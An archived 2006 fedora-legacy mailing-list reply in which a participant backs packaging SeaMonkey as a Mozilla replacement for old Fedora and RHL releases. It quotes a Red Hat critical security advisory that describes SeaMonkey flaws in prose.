Re: Need SeaMonkey opinions - [Fwd: [RHSA-2006:0734-01] Critical: seamonkey security update]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Wednesday 08 November 2006 05:43, David Eisenstein wrote:
>Hello Fedora Legacy and Extras folks,
>
>This below RHEL advisory just came out, along with advisories like this
> for Thunderbird and for Firefox.  We in Legacy need to get busy on
> these, because they are critical bugs, and we haven't updated any
> Firefox, Thunderbird, or SeaMonkey (er, Mozilla) packages in a LONG
> time.
>
>There are some old Bugzilla's that had been open for RHL 7.3, RHL 9, FC
> 1, FC 2, and FC 3 for Mozilla.  There has been a running discussion (and
> no action -- largely my fault -- sorry!) about how and whether we
> upgrade Mozilla to SeaMonkey so that SeaMonkey becomes a Mozilla
> replacement (Core) package rather than an Extras package on a Bugzilla
> ticket for SeaMonkey. The Bugzilla number is 209167:
><https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209167>.
>
>My understanding is that Michal Jaegermann (Fedora Legacy contributor)
> has done work on at least one or more previous versions of SeaMonkey,
> having created (FC4?) packages that should, once installed, act as a
> Mozilla replacement, not unlike what the RHEL packages mentioned in
> RHSA-2006-0734 do.
>
>The advantage of having SeaMonkey do this is that all other packages
> (such as yelp, epiphany, possibly others) will inherit the more secure
> code from SeaMonkey, since they tap into the shared-library (.so) files
> that SeaMonkey would be providing.  My understanding then also would be
> that SeaMonkey is meant to be API compatible with Mozilla, so that other
> programs that depend on functions (or objects) in Mozilla's
> shared-library should continue to work okay, possibly without
> recompilation, but probably requiring recompilation and pushing to
> updates.
>
>Does anyone have any comments on how you wish the Legacy Project to
> approach this?  I favor SeaMonkey as a Mozilla replacement, as it covers
> all vulnerabilities in packages that dynamically link to the shared
> libraries. But perhaps there are other ideas.
>
>Since Legacy Mozilla/Firefox/Thunderbird security bugs have been open
> since June (and not worked on), I also advocate that we in Legacy build
> SeaMonkey packages for *all* releases of Fedora Core that we have ever
> supported (since older releases were supported at that time) and RHL 7.3
> and RHL 9. Does anyone object to that?
>
>What say ye??
>
As an interested sidewalk superintendant, I'd say go with seamonkey since a 
lot of that stuff comes for free with it.

> Regards,
> David Eisenstein
>
>
>
>-------- Original Message --------
>Subject: [RHSA-2006:0734-01] Critical: seamonkey security update
>Date: Wed, 8 Nov 2006 04:48:59 -0500
>From: bugzilla@xxxxxxxxxx
>To: enterprise-watch-list@xxxxxxxxxx
>
>---------------------------------------------------------------------
>                   Red Hat Security Advisory
>
>Synopsis:          Critical: seamonkey security update
>Advisory ID:       RHSA-2006:0734-01
>Advisory URL:      https://rhn.redhat.com/errata/RHSA-2006-0734.html
>Issue date:        2006-11-08
>Updated on:        2006-11-08
>Product:           Red Hat Enterprise Linux
>CVE Names:         CVE-2006-5462 CVE-2006-5463 CVE-2006-5464
>                   CVE-2006-5747 CVE-2006-5748
>---------------------------------------------------------------------
>
>1. Summary:
>
>Updated seamonkey packages that fix several security bugs are now
> available for Red Hat Enterprise Linux 2.1, 3, and 4.
>
>This update has been rated as having critical security impact by the Red
>Hat Security Response Team.
>
>2. Relevant releases/architectures:
>
>... (RHEL 2.1, RHEL 3, RHEL 4) ...
>
>3. Problem description:
>
>SeaMonkey is an open source Web browser, advanced email and newsgroup
>client, IRC chat client, and HTML editor.
>
>Several flaws were found in the way SeaMonkey processes certain malformed
>Javascript code. A malicious web page could cause the execution of
>Javascript code in such a way that could cause SeaMonkey to crash or
>execute arbitrary code as the user running SeaMonkey. (CVE-2006-5463,
>CVE-2006-5747, CVE-2006-5748)
>
>Several flaws were found in the way SeaMonkey renders web pages. A
>malicious web page could cause the browser to crash or possibly execute
>arbitrary code as the user running SeaMonkey. (CVE-2006-5464)
>
>A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA
> keys with exponent 3 it is possible for an attacker to forge a signature
> that would be incorrectly verified by the NSS library. SeaMonkey as
> shipped trusts several root Certificate Authorities that use exponent 3.
> An attacker could have created a carefully crafted SSL certificate which
> be incorrectly trusted when their site was visited by a victim. This
> flaw was previously thought to be fixed in SeaMonkey 1.0.5, however
> Ulrich Kuehn discovered the fix was incomplete (CVE-2006-5462)
>
>Users of SeaMonkey are advised to upgrade to these erratum packages,
> which contains SeaMonkey version 1.0.6 that corrects these issues.
>
><<snip>>

-- 
Cheers, Gene
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Yahoo.com and AOL/TW attorneys please note, additions to the above
message by Gene Heskett are:
Copyright 2006 by Maurice Eugene Heskett, all rights reserved.

--
fedora-legacy-list mailing list
fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

[Index of Archives]     [Fedora Development]     [Fedora Announce]     [Fedora Legacy Announce]     [Fedora Config]     [PAM]     [Fedora General Discussion]     [Big List of Linux Books]     [Gimp]     [Yosemite Questions]

  Powered by Linux